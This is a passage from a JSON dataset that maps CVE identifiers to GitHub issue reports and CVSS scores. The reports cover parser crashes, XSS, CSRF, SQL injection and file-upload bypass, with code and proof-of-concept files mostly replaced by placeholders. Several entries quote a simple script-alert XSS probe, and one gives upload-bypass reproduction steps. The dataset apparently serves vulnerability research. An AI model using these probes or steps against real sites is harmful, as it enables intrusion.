        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45834",
        "Issue_Url_old": "https://github.com/opendocman/opendocman/issues/330",
        "Issue_Url_new": "https://github.com/opendocman/opendocman/issues/330",
        "Repo_new": "opendocman/opendocman",
        "Issue_Created_At": "2022-03-17T13:27:08Z",
        "description": "Security Vulnerability Unrestricted File Upload. Describe the bug Attacker can upload files with dangerous types to the APITAG NUMBERTAG ia FILETAG using MIME bypass. File is available under specific ID, which is returned in response from application. To Reproduce Steps to reproduce the behavior NUMBERTAG Login to the application NUMBERTAG Click on APITAG Document NUMBERTAG Create a file named APITAG containing string: APITAG NUMBERTAG The document is being successfully uploaded and the APITAG header is describing the location of the file NUMBERTAG The file is available under provided ID with .dat extension under /document_repository directory. Expected behavior Application should reject the file based on the magic bytes provided. Screenshots Step NUMBERTAG Adding the document with malicious content. FILETAG Step NUMBERTAG Retrieving the content. FILETAG Versions (where applicable): APITAG NUMBERTAG APITAG NUMBERTAG PHP NUMBERTAG Web Server Type: Apache Web Server Version NUMBERTAG OS: [e.g. iOS] Kali APITAG Browser [e.g. chrome, safari] Firefox Browser Version [e.g NUMBERTAG esr",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45834",
        "Issue_Url_old": "https://github.com/opendocman/opendocman/issues/326",
        "Issue_Url_new": "https://github.com/opendocman/opendocman/issues/326",
        "Repo_new": "opendocman/opendocman",
        "Issue_Created_At": "2021-08-02T17:49:53Z",
        "description": "Trying to get in touch regarding a security issue. Hi there, I couldn't find a APITAG in your repository and am not sure how to best contact you privately to disclose a security issue. Can you add a APITAG file with an e mail to your repository, so that our system can send you the vulnerability details? APITAG suggests that a security policy URLTAG is the best way to make sure security issues are responsibly disclosed. Once you've done that, you should receive an e mail within the next hour with more info. Thanks! (cc APITAG helper)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45835",
        "Issue_Url_old": "https://github.com/rskoolrash/Online-Admission-System/issues/2",
        "Issue_Url_new": "https://github.com/rskoolrash/online-admission-system/issues/2",
        "Repo_new": "rskoolrash/online-admission-system",
        "Issue_Created_At": "2021-12-23T12:27:37Z",
        "description": "Security Vulnerability. Hello, I'm trying to reach you regarding security vulnerability I have found in your application. Can you add a APITAG file with an e mail to your repository, so that our system can send you the vulnerability details? APITAG suggests that a security policy is the best way to make sure security issues are responsibly disclosed. Once you've done that, you should receive an e mail within the next hour with more info. Thanks!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45846",
        "Issue_Url_old": "https://github.com/slic3r/Slic3r/issues/5117",
        "Issue_Url_new": "https://github.com/slic3r/slic3r/issues/5117",
        "Repo_new": "slic3r/slic3r",
        "Issue_Created_At": "2021-12-26T17:21:29Z",
        "description": "NULL pointer dereference in AMF XML parser (metadata tag without type attribute). Summary A crafted AMF XML document can cause a crash due to a NULL pointer dereference during parsing. Vulnerable versions Slic3r (commit APITAG Step to reproduce NUMBERTAG Create the proof of concept OBJ file ( APITAG ): APITAG NUMBERTAG Execute APITAG NUMBERTAG Observe segmentation fault. Cause An attempt is made to read the type attribute of the APITAG tag, at APITAG URLTAG . The APITAG contains a metadata tag without a type attribute. APITAG returns NULL, and thus the creation of the APITAG crashes. Impact Denial of Service. Proposed mitigation Check for NULL before trying to construct the APITAG , set a default value or reject the tag. Similar checks are already in place at line NUMBERTAG URLTAG and others.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45847",
        "Issue_Url_old": "https://github.com/slic3r/Slic3r/issues/5118",
        "Issue_Url_new": "https://github.com/slic3r/slic3r/issues/5118",
        "Repo_new": "slic3r/slic3r",
        "Issue_Created_At": "2021-12-26T20:32:19Z",
        "description": "NULL pointer dereference in NUMBERTAG MF XML parser (vertex tag without PATHTAG attribute). Summary A crafted NUMBERTAG MF XML document can cause a crash due to a NULL pointer dereference during parsing. Vulnerable versions Slic3r (commit APITAG Step to reproduce NUMBERTAG Create the proof of concept OBJ file ( APITAG ): CODETAG NUMBERTAG Pack the file into a zip archive together with the prerequisite other files from a NUMBERTAG mf file: APITAG NUMBERTAG Rename the zip archive to APITAG NUMBERTAG Execute APITAG NUMBERTAG Observe segmentation fault. Example file FILETAG Cause APITAG in TMF.cpp returns NULL if the sought attribute is missing. The NULL check at APITAG URLTAG is ineffective, since APITAG does not terminate the current function. Execution continues to line NUMBERTAG where strtof receives a NULL pointer input, and a crash results. Impact Denial of Service. Proposed mitigation Throw an exception in APITAG to ensure that file parsing stops immediately.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45847",
        "Issue_Url_old": "https://github.com/slic3r/Slic3r/issues/5119",
        "Issue_Url_new": "https://github.com/slic3r/slic3r/issues/5119",
        "Repo_new": "slic3r/slic3r",
        "Issue_Created_At": "2021-12-26T20:37:00Z",
        "description": "NULL pointer dereference in NUMBERTAG MF XML parser (triangle tag without PATHTAG attribute). Summary A crafted NUMBERTAG MF XML document can cause a crash due to a NULL pointer dereference during parsing. Vulnerable versions Slic3r (commit APITAG Step to reproduce NUMBERTAG Create the proof of concept OBJ file ( APITAG ): CODETAG NUMBERTAG Pack the file into a zip archive together with the prerequisite other files from a NUMBERTAG mf file: APITAG NUMBERTAG Rename the zip archive to APITAG NUMBERTAG Execute APITAG NUMBERTAG Observe segmentation fault. Example file FILETAG Cause APITAG in TMF.cpp returns NULL if the sought attribute is missing. The NULL check at APITAG URLTAG is ineffective, since APITAG does not terminate the current function. Execution continues to line NUMBERTAG where atoi receives a NULL pointer input, and a crash results. Impact Denial of Service. Proposed mitigation Throw an exception in APITAG to ensure that file parsing stops immediately.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45847",
        "Issue_Url_old": "https://github.com/slic3r/Slic3r/issues/5120",
        "Issue_Url_new": "https://github.com/slic3r/slic3r/issues/5120",
        "Repo_new": "slic3r/slic3r",
        "Issue_Created_At": "2021-12-26T20:44:57Z",
        "description": "NULL pointer dereference in NUMBERTAG MF XML parser (slic3r:volume tag without PATHTAG attribute). Summary A crafted NUMBERTAG MF XML document can cause a crash due to a NULL pointer dereference during parsing. Vulnerable versions Slic3r (commit APITAG Step to reproduce NUMBERTAG Create the proof of concept OBJ file ( APITAG ): CODETAG NUMBERTAG Pack the file into a zip archive together with the prerequisite other files from a NUMBERTAG mf file: APITAG NUMBERTAG Rename the zip archive to APITAG NUMBERTAG Execute APITAG NUMBERTAG Observe segmentation fault. Example file FILETAG Cause APITAG in TMF.cpp returns NULL if the sought attribute is missing. The constructor of APITAG is invoked implicitly, leading to a crash ( APITAG ). The check at APITAG URLTAG is ineffective, since it occurs after the NULL pointer is dereferenced. Impact Denial of Service. Proposed mitigation Perform a NULL check on the return values from APITAG before constructing strings from them. Ensure that the NULL check terminates parsing, as proposed in NUMBERTAG and NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45848",
        "Issue_Url_old": "https://github.com/nicotine-plus/nicotine-plus/issues/1777",
        "Issue_Url_new": "https://github.com/nicotine-plus/nicotine-plus/issues/1777",
        "Repo_new": "nicotine-plus/nicotine-plus",
        "Issue_Created_At": "2021-12-22T17:11:07Z",
        "description": "Just crashed on Win NUMBERTAG insider ring. Type: <class ERRORTAG Value: access: embedded null character in path Traceback: File APITAG line NUMBERTAG in network_event File APITAG line NUMBERTAG in queue_upload File APITAG line NUMBERTAG in queue_upload File APITAG line NUMBERTAG in file_is_shared",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45852",
        "Issue_Url_old": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/6",
        "Issue_Url_new": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/6",
        "Repo_new": "projectworldsofficial/hospital-management-system-in-php",
        "Issue_Created_At": "2021-12-23T13:36:14Z",
        "description": "Unauthorized adding patient in FILETAG . Version NUMBERTAG No login is required Steps to reproduce APITAG the data packet as APITAG can see that there is no cookie. FILETAG APITAG logging in, I found that the addition was successful FILETAG Source code review FILETAG line NUMBERTAG FILETAG Enter the APITAG function FILETAG The problem is that although the redirection is made, APITAG is not executed, causeing to continue to execute the code below. FILETAG Succeeded in adding patient without authorization",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45860",
        "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/510",
        "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/510",
        "Repo_new": "justdan96/tsmuxer",
        "Issue_Created_At": "2021-12-21T08:53:16Z",
        "description": "An Integer Overflow in APITAG Hi, I found a integer overflow in APITAG URLTAG POC FILETAG With this poc, the buffer is too small but the condition on line NUMBERTAG results true. gdb ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45861",
        "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/478",
        "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/478",
        "Repo_new": "justdan96/tsmuxer",
        "Issue_Created_At": "2021-10-18T14:29:17Z",
        "description": "Assertion Failed in APITAG APITAG Hi, I Found an Assertion Failed error. Some info: APITAG To reproduce NUMBERTAG Compile APITAG NUMBERTAG Run tsmuxer ERRORTAG POC FILETAG gdb output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45863",
        "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/509",
        "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/509",
        "Repo_new": "justdan96/tsmuxer",
        "Issue_Created_At": "2021-12-21T08:06:40Z",
        "description": "heap buffer overflow in APITAG APITAG Hi, I found a heap buffer overflow error. Some Info APITAG To reproduce NUMBERTAG Compile APITAG NUMBERTAG run tsmuxer APITAG Asan output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45884",
        "Issue_Url_old": "https://github.com/brave/brave-browser/issues/20079",
        "Issue_Url_new": "https://github.com/brave/brave-browser/issues/20079",
        "Repo_new": "brave/brave-browser",
        "Issue_Created_At": "2021-12-13T20:42:44Z",
        "description": "Desktop] Release notes for APITAG . Improve formatting of input values (send and swap NUMBERTAG URLTAG Full Fiat Balance not showing with ERC NUMBERTAG tokens NUMBERTAG URLTAG Update default widget list for desktop NUMBERTAG URLTAG it is possible to delete the active network on PATHTAG NUMBERTAG URLTAG Changes to sync QR code NUMBERTAG URLTAG Make APITAG screen working on both APITAG devices NUMBERTAG URLTAG Double click by APITAG buttons for Trezor transactions closes wallet panel NUMBERTAG URLTAG We aren\u2019t displaying asset balances until we get prices for them, we should NUMBERTAG URLTAG Don't treat unknown balances as NUMBERTAG show N/A instead NUMBERTAG ERRORTAG URLTAG Make the front end use the default currency and default cryptocurrency from settings NUMBERTAG URLTAG Link for IPFS preference settings page is hidden for some window sizes NUMBERTAG URLTAG Update NTP Background Images component for Fall NUMBERTAG wallpapers on desktop NUMBERTAG URLTAG hackerone NUMBERTAG CNAME Uncloacking in SOCKS5 protocol NUMBERTAG URLTAG Brave reading PATHTAG NUMBERTAG URLTAG Add menu to allow to edit/remove networks on wallet page NUMBERTAG URLTAG Allow folks to enable File System API with a Flag NUMBERTAG URLTAG Clicking Solve on adaptive captcha Brave Ads paused modal sometimes yields no action NUMBERTAG URLTAG Add Google's new iOS URL parameters to the query string filter NUMBERTAG URLTAG Implement APITAG and in particular APITAG version of EIP NUMBERTAG URLTAG Implement Rewards settings section inside brave://settings NUMBERTAG URLTAG hackerone] Strip referrer and origin in cross origin requests from a .onion origin NUMBERTAG URLTAG Re enable the post uninstall survey on Windows NUMBERTAG URLTAG Implement new Rewards NTP Widget NUMBERTAG design NUMBERTAG URLTAG Use error modals in Brave Rewards settings page instead of error notifications for linking related errors (convert these notifications to error modals NUMBERTAG URLTAG Unable to go backwards on IPFS pages when automatic APITAG redirection is enabled NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45884",
        "Issue_Url_old": "https://github.com/brave/brave-browser/issues/19070",
        "Issue_Url_new": "https://github.com/brave/brave-browser/issues/19070",
        "Repo_new": "brave/brave-browser",
        "Issue_Created_At": "2021-10-28T16:16:06Z",
        "description": "hackerone NUMBERTAG CNAME Uncloacking in SOCKS5 protocol. URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45890",
        "Issue_Url_old": "https://github.com/AuthGuard/AuthGuard/issues/166",
        "Issue_Url_new": "https://github.com/authguard/authguard/issues/166",
        "Repo_new": "authguard/authguard",
        "Issue_Created_At": "2021-08-23T19:06:49Z",
        "description": "Authentication ignores inactive identifiers.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45928",
        "Issue_Url_old": "https://github.com/libjxl/libjxl/issues/360",
        "Issue_Url_new": "https://github.com/libjxl/libjxl/issues/360",
        "Repo_new": "libjxl/libjxl",
        "Issue_Created_At": "2021-07-26T11:42:15Z",
        "description": "Out of bounds write in master libjxl reported by oss fuzz. Hello, oss fuzz is reporting an out of bounds write in libjxl master: ERRORTAG Reproducer: FILETAG APITAG testcase minimized NUMBERTAG jxl",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45944",
        "Issue_Url_old": "https://github.com/google/oss-fuzz-vulns/issues/16",
        "Issue_Url_new": "https://github.com/google/oss-fuzz-vulns/issues/16",
        "Repo_new": "google/oss-fuzz-vulns",
        "Issue_Created_At": "2022-01-04T20:58:23Z",
        "description": "Fixing commit from OS NUMBERTAG seems wrong. Hi URLTAG references a fixing commit which though only removes a documentation snipped. Unless my bisect done is wrong, then the following should be the fixing commit: URLTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45958",
        "Issue_Url_old": "https://github.com/ultrajson/ultrajson/issues/501",
        "Issue_Url_new": "https://github.com/ultrajson/ultrajson/issues/501",
        "Repo_new": "ultrajson/ultrajson",
        "Issue_Created_At": "2022-02-06T01:14:09Z",
        "description": "Segmentation fault with large indent. What did you do? APITAG This is the smallest value that triggers the segfault on my machine with this build of ujson. I'm sure it's no coincidence that it's slightly larger than NUMBERTAG APITAG What did you expect to happen? Properly (if poorly) formatted output What actually happened? SIGSEGV What versions are you using? OS: Debian Sid Python NUMBERTAG APITAG NUMBERTAG d NUMBERTAG f I think the reason might lie in the fact that the APITAG call in encode does not appear to account for indentation at all. I wouldn't be surprised if other things could also trigger buffer overruns in certain conditions, e.g. the absence of APITAG causing the insertion of extra spaces NUMBERTAG and NUMBERTAG might be symptoms of the same underlying bug. Note that they both use indentation.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45958",
        "Issue_Url_old": "https://github.com/ultrajson/ultrajson/issues/502",
        "Issue_Url_new": "https://github.com/ultrajson/ultrajson/issues/502",
        "Repo_new": "ultrajson/ultrajson",
        "Issue_Created_At": "2022-02-07T16:43:38Z",
        "description": "CVETAG from oss fuzz report. Hi Recently CVETAG URLTAG was published which is an assignment due to the oss fuzz report in CVETAG see as well FILETAG This reference says: events: introduced: APITAG fixed: APITAG where though the APITAG refers to a change in the AFL++ fuzzer: URLTAG (see URLTAG Quoting a mail from MITRE: Some of the possibilities are NUMBERTAG There was never a buffer overflow. It was simply an artifact of an older version of the APITAG fuzzing software NUMBERTAG There still is a buffer overflow, but it is no longer detected. In particular, the introduced value above corresponds to URLTAG this has function names that mention the APITAG Append Unchecked\" words. One might guess that APITAG means accepting the risk of a buffer overflow. MITRE confirmed that the CVE could be rejected if it can be confirmed that the reproducer testcase from URLTAG does not have a buffer overflow for the APITAG call shown in FILETAG for APITAG NUMBERTAG Do you have any more insights here?",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45960",
        "Issue_Url_old": "https://github.com/libexpat/libexpat/issues/531",
        "Issue_Url_new": "https://github.com/libexpat/libexpat/issues/531",
        "Repo_new": "libexpat/libexpat",
        "Issue_Created_At": "2021-12-30T19:24:38Z",
        "description": "Reserved NUMBERTAG security issue upcoming). TBA",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-46020",
        "Issue_Url_old": "https://github.com/mruby/mruby/issues/5613",
        "Issue_Url_new": "https://github.com/mruby/mruby/issues/5613",
        "Repo_new": "mruby/mruby",
        "Issue_Created_At": "2021-12-27T16:51:56Z",
        "description": "Untrusted Pointer Dereference in APITAG Untrusted Pointer Dereference in APITAG Description An Untrusted Pointer Dereference was discovered in APITAG The vulnerability causes a segmentation fault and application crash. version NUMBERTAG de0fcb APITAG System information Ubuntu NUMBERTAG focal, AMD EPYC NUMBERTAG Core NUMBERTAG GHz Proof of Concept poc CODETAG command: APITAG Result APITAG gdb ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46024",
        "Issue_Url_old": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/3",
        "Issue_Url_new": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/3",
        "Repo_new": "projectworldsofficial/online-shopping-webvsite-in-php",
        "Issue_Created_At": "2021-12-28T02:29:39Z",
        "description": "SQL Injection vulnerability via the \"id\" parameter in FILETAG . Version NUMBERTAG No login is required APITAG FILETAG Source code review FILETAG Remediation Validate input of id parameter in APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46025",
        "Issue_Url_old": "https://github.com/zhangyd-c/OneBlog/issues/27",
        "Issue_Url_new": "https://github.com/zhangyd-c/oneblog/issues/27",
        "Repo_new": "zhangyd-c/oneblog",
        "Issue_Created_At": "2021-12-28T03:34:48Z",
        "description": "There is a stored xss vulnerability exists in APITAG APITAG alert(\"xss\") APITAG code FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-46026",
        "Issue_Url_old": "https://github.com/wangl1989/mysiteforme/issues/39",
        "Issue_Url_new": "https://github.com/wangl1989/mysiteforme/issues/39",
        "Repo_new": "wangl1989/mysiteforme",
        "Issue_Created_At": "2021-12-28T07:38:42Z",
        "description": "There is a stored xss vulnerability exists in mysiteforme. Cross APITAG Scripting (XSS) vulnerability exists in mysiteforme By accessing the add blog tag function in the blog tag in the background blog management, and inserting the < script > alert (\"XSS\") APITAG code, it will be found that an XSS window will pop up on the page after adding successfully. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-46027",
        "Issue_Url_old": "https://github.com/wangl1989/mysiteforme/issues/40",
        "Issue_Url_new": "https://github.com/wangl1989/mysiteforme/issues/40",
        "Repo_new": "wangl1989/mysiteforme",
        "Issue_Created_At": "2021-12-29T06:10:07Z",
        "description": "There is a stored xss vulnerability exists in mysiteforme . There is a CSRF vulnerability in the background blog management. The attacker constructs a CSRF load. Once the administrator clicks a malicious link, a blog tag will be added FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-46028",
        "Issue_Url_old": "https://github.com/langhsu/mblog/issues/50",
        "Issue_Url_new": "https://github.com/langhsu/mblog/issues/50",
        "Repo_new": "langhsu/mblog",
        "Issue_Created_At": "2021-12-30T06:21:03Z",
        "description": "There is a CSRF vulnerability exists in APITAG There is a CSRF vulnerability in the background article management. The attacker constructs a CSRF load. Once the administrator clicks a malicious link, the article will be deleted. FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-46030",
        "Issue_Url_old": "https://github.com/ChinaLHR/JavaQuarkBBS/issues/23",
        "Issue_Url_new": "https://github.com/chinalhr/javaquarkbbs/issues/23",
        "Repo_new": "chinalhr/javaquarkbbs",
        "Issue_Created_At": "2021-12-28T03:40:49Z",
        "description": "There are two stored XSS in APITAG APITAG Description\u3011 There is a Cross Site Scripting attack (XSS) vulnerability in the full version of APITAG By entering specific statements into the background tag management module, the attack statement will be stored in the database, and the next victim will be attacked when he accesses the tag module. APITAG Type\u3011 Cross Site Scripting (XSS) APITAG Version NUMBERTAG APITAG Verification\u3011 Find the Background Label Management module, select the new location and enter APITAG FILETAG APITAG FILETAG APITAG Suggestions\u3011 Strict filtering of user input data",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-46033",
        "Issue_Url_old": "https://github.com/saysky/ForestBlog/issues/69",
        "Issue_Url_new": "https://github.com/saysky/forestblog/issues/69",
        "Repo_new": "saysky/forestblog",
        "Issue_Created_At": "2021-12-28T07:42:20Z",
        "description": "File upload bypass exists. In this code, the verification suffix should verify the file type after the last point\uff1a public final String APITAG = APITAG / \u4e0a\u4f20\u6587\u4ef6 MENTIONTAG file MENTIONTAG MENTIONTAG ERRORTAG / APITAG = \"/img\", method = APITAG public APITAG APITAG APITAG file) { APITAG //\u6587\u4ef6\u7684\u5b8c\u6574\u540d\u79f0, APITAG String filename = APITAG //\u6587\u4ef6\u540d,\u5982spring String name = APITAG APITAG //\u6587\u4ef6\u540e\u7f00,\u5982.jpeg String suffix = APITAG if APITAG NUMBERTAG return new APITAG } example: FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46034",
        "Issue_Url_old": "https://github.com/saysky/ForestBlog/issues/70",
        "Issue_Url_new": "https://github.com/saysky/forestblog/issues/70",
        "Repo_new": "saysky/forestblog",
        "Issue_Created_At": "2021-12-29T07:16:11Z",
        "description": "XSS vulnerability exists. There is no character verification for the nickname of the registration interface FILETAG The administrator clicks the user function to pop up the XSS prompt box FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-46038",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2000",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2000",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-22T15:49:42Z",
        "description": "untrusted pointer dereference APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result segmentation fault bt ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46039",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1999",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1999",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-22T12:55:57Z",
        "description": "untrusted pointer dereference in APITAG (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46040",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2003",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2003",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-22T16:27:40Z",
        "description": "Untrusted pointer dereference in APITAG (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46041",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2004",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2004",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-22T17:31:48Z",
        "description": "Untrusted pointer dereference in co NUMBERTAG box_new (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt CODETAG",
